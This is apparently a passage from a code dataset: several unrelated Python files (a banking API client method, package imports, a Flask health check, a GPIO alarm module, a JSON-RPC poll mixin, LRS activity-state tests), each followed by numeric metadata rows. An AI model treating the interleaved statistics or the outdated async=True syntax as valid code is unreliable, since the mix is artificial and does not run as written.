Retrieve a list of bank providers. A provider-**id** is necessary to create an _access_. To retrieve the necessary access fields, you need to query the specific `provider/{providerId}`. For performance reasons they are kept separate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_providers_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str bank_code: Optional — if length = 8, the response will also contain data describing the fields required for account setup
:param bool supported: Optional — response should only contain providers supported for account setup via this API
:param str query: Optional — search parameters for BankCode, BIC, Location, Name. Will be ignored if the bankCode query parameter is set.
:return: list[Provider]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bank_code', 'supported', 'query'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_providers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'bank_code' in params:
query_params.append(('bankCode', params['bank_code'])) # noqa: E501
if 'supported' in params:
query_params.append(('supported', params['supported'])) # noqa: E501
if 'query' in params:
query_params.append(('query', params['query'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/providers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Provider]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.746725 | 277 | 0.620298 | 1,091 | 9,331 | 5.12099 | 0.187901 | 0.042957 | 0.020047 | 0.025774 | 0.82155 | 0.781815 | 0.781815 | 0.746733 | 0.746733 | 0.732951 | 0 | 0.016745 | 0.289572 | 9,331 | 228 | 278 | 40.925439 | 0.825162 | 0.04694 | 0 | 0.666667 | 0 | 0 | 0.162185 | 0.032065 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.035088 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
586baca1222aea22911b6969182be508daf1088d | 182 | py | Python | ithopy/__init__.py | philipkocanda/ithopy | 96b3ee8f7a272e8b8d0b67f8fb5ca888814b0203 | [
"MIT"
] | 1 | 2021-10-04T08:35:52.000Z | 2021-10-04T08:35:52.000Z | ithopy/__init__.py | philipkocanda/ithopy | 96b3ee8f7a272e8b8d0b67f8fb5ca888814b0203 | [
"MIT"
] | null | null | null | ithopy/__init__.py | philipkocanda/ithopy | 96b3ee8f7a272e8b8d0b67f8fb5ca888814b0203 | [
"MIT"
] | null | null | null | from ithopy.message import Message
from ithopy.payload import Payload
from ithopy.devices.hru_device import HruDevice
from ithopy.devices.hru_message_builder import HruMessageBuilder | 45.5 | 64 | 0.884615 | 25 | 182 | 6.32 | 0.44 | 0.253165 | 0.21519 | 0.253165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082418 | 182 | 4 | 64 | 45.5 | 0.946108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
586e52a200ecdf981c4e8e72590608685ce08b5a | 234 | py | Python | src/GameGenerator.py | NowanIlfideme/MafiaEngine | cec0ea28172154d14a2db13f04c22b0b43834755 | [
"Apache-2.0"
] | 2 | 2017-07-15T19:02:02.000Z | 2017-07-26T02:38:21.000Z | src/GameGenerator.py | NowanIlfideme/MafiaEngine | cec0ea28172154d14a2db13f04c22b0b43834755 | [
"Apache-2.0"
] | null | null | null | src/GameGenerator.py | NowanIlfideme/MafiaEngine | cec0ea28172154d14a2db13f04c22b0b43834755 | [
"Apache-2.0"
] | null | null | null | from mafia_engine.base import *
from mafia_engine.entity import *
from mafia_engine.ability import *
from mafia_engine.trigger import *
def generate_game():
ge = GameEngine(
status={'phase':None}
)
pass | 13.764706 | 34 | 0.679487 | 29 | 234 | 5.310345 | 0.586207 | 0.233766 | 0.38961 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235043 | 234 | 17 | 35 | 13.764706 | 0.860335 | 0 | 0 | 0 | 1 | 0 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.111111 | 0.444444 | 0 | 0.555556 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
49b62922479ce92fc4986c7924d43425e1d09efa | 319 | py | Python | Chapter 3/Exersises/(3-3) Your Own List.py | 3GamersStudios/SHSPythonWork | 6f98ad3a25d30f2670dc48ca4f9b4cf75eb37a61 | [
"MIT"
] | null | null | null | Chapter 3/Exersises/(3-3) Your Own List.py | 3GamersStudios/SHSPythonWork | 6f98ad3a25d30f2670dc48ca4f9b4cf75eb37a61 | [
"MIT"
] | null | null | null | Chapter 3/Exersises/(3-3) Your Own List.py | 3GamersStudios/SHSPythonWork | 6f98ad3a25d30f2670dc48ca4f9b4cf75eb37a61 | [
"MIT"
] | null | null | null | carsToDrive = ['lamborghini', 'ferrari', 'porsche', 'audi']
print(f"I think it would be cool to drive a {carsToDrive[0]}!")
print(f"I think it would be cool to drive a {carsToDrive[1]}!")
print(f"I think it would be cool to drive a {carsToDrive[2]}!")
print(f"I think it would be cool to drive a {carsToDrive[3]}!") | 35.444444 | 63 | 0.689655 | 57 | 319 | 3.859649 | 0.350877 | 0.109091 | 0.127273 | 0.218182 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0 | 0.014815 | 0.153605 | 319 | 9 | 64 | 35.444444 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.753125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.8 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
49d6ca4bd1a3d1ce462daf3c209cc30e2153cc50 | 141 | py | Python | messenger/health_check/health.py | EducationalTestingService/halef-messenger | 59eccdbf021a5a1e8290b4f61fdc2b1d74947993 | [
"Apache-2.0"
] | null | null | null | messenger/health_check/health.py | EducationalTestingService/halef-messenger | 59eccdbf021a5a1e8290b4f61fdc2b1d74947993 | [
"Apache-2.0"
] | 1 | 2017-06-05T22:57:47.000Z | 2017-06-05T22:58:45.000Z | messenger/health_check/health.py | EducationalTestingService/halef-messenger | 59eccdbf021a5a1e8290b4f61fdc2b1d74947993 | [
"Apache-2.0"
] | null | null | null | from flask import jsonify
from . import health_check
@health_check.route("/health_check")
def health_check():
return jsonify(ok=True)
| 15.666667 | 36 | 0.758865 | 20 | 141 | 5.15 | 0.55 | 0.427184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141844 | 141 | 8 | 37 | 17.625 | 0.85124 | 0 | 0 | 0 | 0 | 0 | 0.092199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
3f7b9ab258be9ebba989073c04770fd2b72c3330 | 139 | py | Python | torchvision/io/__init__.py | cpuhrsch/vision | bbd363ca2713fb68e1e190206578e600a87baf90 | [
"BSD-3-Clause"
] | 9 | 2019-08-15T15:34:36.000Z | 2022-02-09T15:37:36.000Z | torchvision/io/__init__.py | xploiter-projects/vision | bbd363ca2713fb68e1e190206578e600a87baf90 | [
"BSD-3-Clause"
] | 1 | 2019-09-17T18:23:37.000Z | 2019-09-17T18:23:37.000Z | torchvision/io/__init__.py | xploiter-projects/vision | bbd363ca2713fb68e1e190206578e600a87baf90 | [
"BSD-3-Clause"
] | 9 | 2019-10-29T15:44:10.000Z | 2021-03-30T13:57:18.000Z | from .video import write_video, read_video, read_video_timestamps
__all__ = [
'write_video', 'read_video', 'read_video_timestamps'
]
| 19.857143 | 65 | 0.76259 | 18 | 139 | 5.222222 | 0.388889 | 0.382979 | 0.595745 | 0.404255 | 0.808511 | 0.808511 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0.136691 | 139 | 6 | 66 | 23.166667 | 0.783333 | 0 | 0 | 0 | 0 | 0 | 0.302158 | 0.151079 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3fa73f95f9795bda1f17130e14b7a1810d7954ed | 81 | py | Python | Python/3-DevOps/week3/basic_pytest/test_basic.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | 2 | 2022-01-19T02:33:11.000Z | 2022-01-19T02:33:13.000Z | Python/3-DevOps/week3/basic_pytest/test_basic.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | Python/3-DevOps/week3/basic_pytest/test_basic.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | def test_simple_pass():
assert True
def test_simple_fail():
assert False | 16.2 | 23 | 0.728395 | 12 | 81 | 4.583333 | 0.666667 | 0.254545 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197531 | 81 | 5 | 24 | 16.2 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0.25 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
3fbd113249034ea50ea06a1bf3f53fd023c72260 | 45 | py | Python | tests/testlib/testlib_a/main_b.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
] | null | null | null | tests/testlib/testlib_a/main_b.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
] | 1 | 2022-03-12T20:41:21.000Z | 2022-03-13T06:34:30.000Z | tests/testlib/testlib_a/main_b.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
] | null | null | null | def print_name_main_b():
print(__name__)
| 15 | 24 | 0.733333 | 7 | 45 | 3.714286 | 0.714286 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 45 | 2 | 25 | 22.5 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
3ff0ca7976419953df17fe8f3ef0d21d912be1d8 | 1,114 | py | Python | gui/communication/rpi.py | a-bombarda/mvm-gui | e00c3fe39cf25c6fb2d2725891610da8885d1d76 | [
"MIT"
] | null | null | null | gui/communication/rpi.py | a-bombarda/mvm-gui | e00c3fe39cf25c6fb2d2725891610da8885d1d76 | [
"MIT"
] | null | null | null | gui/communication/rpi.py | a-bombarda/mvm-gui | e00c3fe39cf25c6fb2d2725891610da8885d1d76 | [
"MIT"
] | null | null | null | """
This module interfaces the GUI with the GPIO.
"""
try:
import RPi.GPIO as GPIO
def configure():
"""
Configures the pins.
Call this function only once per **program**
"""
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT)
def start_alarm_system():
"""
Raises the LED and buzzer alarm
"""
GPIO.setmode(GPIO.BCM)
GPIO.output(17, GPIO.HIGH)
def stop_alarm_system():
"""
Lowers the LED and buzzer alarm
"""
GPIO.setmode(GPIO.BCM)
GPIO.output(17, GPIO.LOW)
except (ImportError, RuntimeError):
def configure():
"""
Configures the pins.
Call this function only once per **program**
"""
print("rpi.configure - fake function")
def start_alarm_system():
"""
Raises the LED and buzzer alarm
"""
print("rpi.stop_alarm_system - fake function")
def stop_alarm_system():
"""
Lowers the LED and buzzer alarm
"""
print("rpi.stop_alarm_system - fake function")
| 21.018868 | 54 | 0.551167 | 127 | 1,114 | 4.740157 | 0.338583 | 0.109635 | 0.059801 | 0.099668 | 0.770764 | 0.734219 | 0.734219 | 0.734219 | 0.734219 | 0.734219 | 0 | 0.008152 | 0.339318 | 1,114 | 52 | 55 | 21.423077 | 0.809783 | 0.275583 | 0 | 0.611111 | 0 | 0 | 0.15969 | 0.065116 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.111111 | 0 | 0.444444 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b770792810aff90d4caa86f629414447a678f0ab | 9,317 | py | Python | nerddiary/server/mixins/pollmixin.py | mishamsk/nerddiary | 2d0981c5034460f353c2994347fb95a5c94a55bd | [
"Apache-2.0"
] | null | null | null | nerddiary/server/mixins/pollmixin.py | mishamsk/nerddiary | 2d0981c5034460f353c2994347fb95a5c94a55bd | [
"Apache-2.0"
] | 5 | 2022-02-20T06:10:28.000Z | 2022-03-28T03:22:41.000Z | nerddiary/server/mixins/pollmixin.py | mishamsk/nerddiary | 2d0981c5034460f353c2994347fb95a5c94a55bd | [
"Apache-2.0"
] | null | null | null | from __future__ import annotations
import datetime
from jsonrpcserver import Error, InvalidParams, Result, Success, method
from ...error.error import NerdDiaryError
from ..proto import ServerProtocol
from ..schema import PollExtendedSchema, PollLogsSchema, PollsSchema
class PollMixin:
@method # type:ignore
async def get_polls(self: ServerProtocol, user_id: str) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
polls = None
try:
polls = await ses.get_polls()
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
polls_ret = []
if polls:
for poll in polls:
polls_ret.append(
PollExtendedSchema(
user_id=user_id, poll_name=poll.poll_name, command=poll.command, description=poll.description
)
)
ret = {
"schema": "PollsSchema",
"data": PollsSchema(polls=polls_ret).dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def start_poll(self: ServerProtocol, user_id: str, poll_name: str, poll_ts_iso: str | None = None) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
poll_ts = None
if poll_ts_iso:
try:
poll_ts = datetime.datetime.fromisoformat(poll_ts_iso)
except ValueError:
self._logger.exception(f"Error parsing poll_ts_iso: {poll_ts_iso!r}")
return InvalidParams(f"Invalid ISO timestamp: {poll_ts_iso}")
poll_workflow = None
try:
poll_workflow = await ses.start_poll(poll_name, poll_ts=poll_ts)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollWorkflowStateSchema",
"data": poll_workflow.to_schema().dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def add_poll_answer(self: ServerProtocol, user_id: str, poll_run_id: str, answer: str) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
poll_workflow = None
try:
poll_workflow = await ses.add_poll_answer(poll_run_id=poll_run_id, answer=answer)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollWorkflowStateSchema",
"data": poll_workflow.to_schema().dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def add_default_poll_answer(self: ServerProtocol, user_id: str, poll_run_id: str) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
poll_workflow = None
try:
poll_workflow = await ses.add_default_poll_answer(poll_run_id=poll_run_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollWorkflowStateSchema",
"data": poll_workflow.to_schema().dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def close_poll(self: ServerProtocol, user_id: str, poll_run_id: str, save: bool) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
try:
if poll_run_id == "*":
await ses.close_all_polls(save=save)
else:
await ses.close_poll(poll_run_id=poll_run_id, save=save)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
self._logger.debug("Success")
return Success(True)
@method # type:ignore
async def restart_poll(self: ServerProtocol, user_id: str, poll_run_id: str) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
try:
poll_workflow = await ses.restart_poll(poll_run_id=poll_run_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollWorkflowStateSchema",
"data": poll_workflow.to_schema().dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def get_poll_data(
self: ServerProtocol,
user_id: str,
poll_name: str | None = None,
count: int | None = None,
skip: int | None = None,
) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
try:
data = await ses.get_poll_data(poll_name=poll_name, count=count, skip=skip)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollLogsSchema",
"data": data.dict(),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def get_poll_log(
self: ServerProtocol,
user_id: str,
log_id: int,
) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
try:
poll_workflow = await ses.get_poll_log(log_id=log_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollWorkflowStateSchema",
"data": poll_workflow.to_schema().dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def get_poll_worflow(self: ServerProtocol, user_id: str, poll_run_id: str) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
try:
poll_workflow = await ses.get_poll_worflow(poll_run_id=poll_run_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollWorkflowStateSchema",
"data": poll_workflow.to_schema().dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def log_poll_data(self: ServerProtocol, user_id: str, poll_data: str) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = 0
try:
ret = await ses.log_poll_data(data=PollLogsSchema.parse_raw(poll_data))
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
self._logger.debug("Success")
return Success(ret)
| 34.635688 | 119 | 0.593324 | 1,122 | 9,317 | 4.744207 | 0.081996 | 0.077024 | 0.112718 | 0.093932 | 0.808379 | 0.794665 | 0.789592 | 0.783393 | 0.746571 | 0.746571 | 0 | 0.000153 | 0.298165 | 9,317 | 268 | 120 | 34.764925 | 0.813886 | 0.012772 | 0 | 0.716216 | 0 | 0 | 0.093828 | 0.015021 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.171171 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7d0c342fa70e060db879c2ee8259a144021def8 | 39,000 | py | Python | lrs/tests/ActivityStateTests.py | Sembian/ADL_LRS | 3535dad6371af3f9f5b67f7eabfd0f4a393e0d62 | [
"Apache-2.0"
] | null | null | null | lrs/tests/ActivityStateTests.py | Sembian/ADL_LRS | 3535dad6371af3f9f5b67f7eabfd0f4a393e0d62 | [
"Apache-2.0"
] | null | null | null | lrs/tests/ActivityStateTests.py | Sembian/ADL_LRS | 3535dad6371af3f9f5b67f7eabfd0f4a393e0d62 | [
"Apache-2.0"
] | null | null | null | import hashlib
import urllib
import os
import json
import base64
import ast
import uuid
import datetime
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from lrs import views
from django.utils.timezone import utc
from django.utils import timezone
class ActivityStateTests(TestCase):
url = reverse(views.activity_state)
testagent = '{"name":"test","mbox":"mailto:test@example.com"}'
otheragent = '{"name":"other","mbox":"mailto:other@example.com"}'
activityId = "http://www.iana.org/domains/example/"
activityId2 = "http://www.google.com"
stateId = "the_state_id"
stateId2 = "state_id_2"
stateId3 = "third_state_id"
stateId4 = "4th.id"
registration = str(uuid.uuid1())
content_type = "application/json"
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
self.username = "test"
self.email = "test@example.com"
self.password = "test"
self.auth = "Basic %s" % base64.b64encode("%s:%s" % (self.username, self.password))
form = {'username':self.username,'email': self.email,'password':self.password,'password2':self.password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
self.testparams1 = {"stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
self.teststate1 = {"test":"put activity state 1","obj":{"agent":"test"}}
self.put1 = self.client.put(path, json.dumps(self.teststate1), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.testparams2 = {"stateId": self.stateId2, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams2))
self.teststate2 = {"test":"put activity state 2","obj":{"agent":"test"}}
self.put2 = self.client.put(path, json.dumps(self.teststate2), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.testparams3 = {"stateId": self.stateId3, "activityId": self.activityId2, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams3))
self.teststate3 = {"test":"put activity state 3","obj":{"agent":"test"}}
self.put3 = self.client.put(path, json.dumps(self.teststate3), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.testparams4 = {"stateId": self.stateId4, "activityId": self.activityId2, "agent": self.otheragent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams4))
self.teststate4 = {"test":"put activity state 4","obj":{"agent":"other"}}
self.put4 = self.client.put(path, json.dumps(self.teststate4), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def tearDown(self):
self.client.delete(self.url, self.testparams1, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, self.testparams2, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, self.testparams3, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, self.testparams4, Authorization=self.auth, X_Experience_API_Version="1.0.0")
attach_folder_path = os.path.join(settings.MEDIA_ROOT, "activity_state")
for the_file in os.listdir(attach_folder_path):
file_path = os.path.join(attach_folder_path, the_file)
try:
os.unlink(file_path)
except Exception, e:
raise e
def test_put(self):
self.assertEqual(self.put1.status_code, 204)
self.assertEqual(self.put1.content, '')
self.assertEqual(self.put2.status_code, 204)
self.assertEqual(self.put2.content, '')
self.assertEqual(self.put3.status_code, 204)
self.assertEqual(self.put3.content, '')
self.assertEqual(self.put4.status_code, 204)
self.assertEqual(self.put4.content, '')
def test_put_no_existing_activity(self):
testparams = {"stateId": self.stateId3, "activityId": "http://foobar", "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparams))
teststate = {"test":"put activity state","obj":{"agent":"test"}}
put = self.client.put(path, teststate, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put.status_code, 204)
self.client.delete(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_put_with_registration(self):
testparamsregid = {"registration": "not-uuid", "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
teststateregid = {"test":"put activity state w/ registration","obj":{"agent":"test"}}
put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
teststateregid = {"test":"put activity state w/ registration","obj":{"agent":"test"}}
put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
# also testing get w/ registration id
r = self.client.get(self.url, testparamsregid, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststateregid['test'])
self.assertEqual(robj['obj']['agent'], teststateregid['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
# and tests delete w/ registration id
del_r = self.client.delete(self.url, testparamsregid, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(del_r.status_code, 204)
def test_put_without_auth(self):
testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
teststateregid = {"test":"put activity state w/ registration","obj":{"agent":"test"}}
put1 = self.client.put(path, teststateregid, content_type=self.content_type, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
def test_put_etag_conflict_if_none_match(self):
teststateetaginm = {"test":"etag conflict - if none match *","obj":{"agent":"test"}}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
r = self.client.put(path, teststateetaginm, content_type=self.content_type, If_None_Match='*', Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 412)
self.assertEqual(r.content, 'Resource detected')
r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
